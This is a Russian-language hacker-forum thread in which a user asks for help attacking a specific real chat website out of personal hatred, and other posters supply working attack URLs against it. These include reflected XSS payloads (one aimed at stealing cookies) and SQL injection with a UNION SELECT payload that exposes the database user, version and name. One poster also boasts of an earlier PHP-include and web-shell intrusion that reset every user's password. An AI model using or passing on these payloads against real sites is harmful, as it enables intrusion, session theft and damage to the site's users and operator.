Помогите пожалуста.сломать чат http://www.telecom7.ru/Chat/
 

Обращаюсь за помощью к вам.ко всем,очень мне нужна помощь ваша.пока я только начинаю постигать искуство хакеров,и очень усердно.если кто то может то прошу помощи.надо срончо сломать чат http://www.telecom7.ru/Chat/ или кто нибудь раскажите как можно измыватся над этим чатом,какие там есть глюки чтоб напрмер как нить выкидывать пользователей и др..что там можно зделать так чтоб только пошло на вред этому чату.Я думаю я не буду выкладывать свою причину ненавсити к этому чату.спасибо заранее. :)

чат больно похож на такие, которые алгол описывал в своей статье, http://www.antichat.ru/crackchat/index.html у меня щаз времени нету, прочти статейку, мож чё выйдет

вот xss:
http://www.telecom7.ru/Chat/board.php?ss=">[xss]

Спасибо большое что подсказал.а что xss делает ч захожу по этой ссылке.и просто доска сообщений чата.Можеш пожалуста обьяснить.??

неа .я мож не так хорошо понимаю что там написано но делал как там сказано и нечего не вышло. к сожалению..жду помощи от других просто ну очень надо.

вот полная XSS: http://www.telecom7.ru/Chat/board.php?ss="><script>alert(/XSS/)</script>

а тут написано что с ней делать
http://forum.antichat.ru/thread20140.html

вот еще посерьезней уязвимость.- sql инжекшн.
как я понмаю, это самописный чат какой-то. никогда раньше таких не видел...

http://www.telecom7.ru/Chat/Img.php?id=211578'

вот еще xss

http://www.telecom7.ru/Chat/info.php?i=</title><script>alert(1)</script>

Да самописный чат.Это точно.

я захожу но мне пишет что
SQL ERROR in line 3, function mysql_query это как понять?

to kaban ты дал мне эту ссылкук http://www.telecom7.ru/Chat/board.php?ss="><script>alert(/XSS/)</script>
я её вставил и ты дал ещё одну ссылку чтоб почитать но я так толкьом не понял к чему она.если тебе не трудно то обьясни...пожалуста.

...
 

Это значит что первый SQL запрос выдал ошибку => тебе надо присоединить еще один SQL запрос UNION SELECT 1,2,3/* вот тогда первый выдает ошибку выполняется второй, по-моему на этом сайте во второй колонке передается индентификатор рмсунка => можно попытаться исполнить произволбный php код ))

у тебя есть icq ? дай пожалуста я тебе стукну.и ты мне если не трудно обьясни по понятнее.

Вариант со сукулью не пройдёт не отобразит из за ошибки
http://www.telecom7.ru/Chat/Img.php?id=-211578+union+select+null,user(),null/*

2 Nova
а если просмотреть исходный код изображения то получем
USER() telecom7@192.168.212.116
VERSION() 4.0.15a
DATABASE() telecom7

Мдя а я незаметил =)

Ну так что, его возможно взломать или нет? Что то так никто и не даёт точного ответа! Я слышал что его можно ломануть через сниффер но у меня что то не получилось! Чат его не принимает!

Joker_kill

Что за бред ты несеш? Прочитай посты, а мы о чём говорим?

И с чего ты сделал вывод, что тут хакеров нету? Если ты слепой это твои проблемы...


ЗАПОМНИ

Всё что создано человеком, можно сломать.

Помнится в конце прошлого лета, я его поломал при помощи php-инклудинга. Затем через веб-шелл в eval() накатал скрипт, для смены пароля для определённого пользователя, но из-за ошибки в этом скрипте у всех пользователей пароль сменился на "p4ssw0rd". Админ 3 дня откат БД делал, а вину всю на своего прова свалил). Потом вроде эту багу прикрыли...

http://www.telecom7.ru/Chat/board.php?ss="><script>alert(document.cookie)</script>
покруи вызови вторую ошибку и всё будет круть))))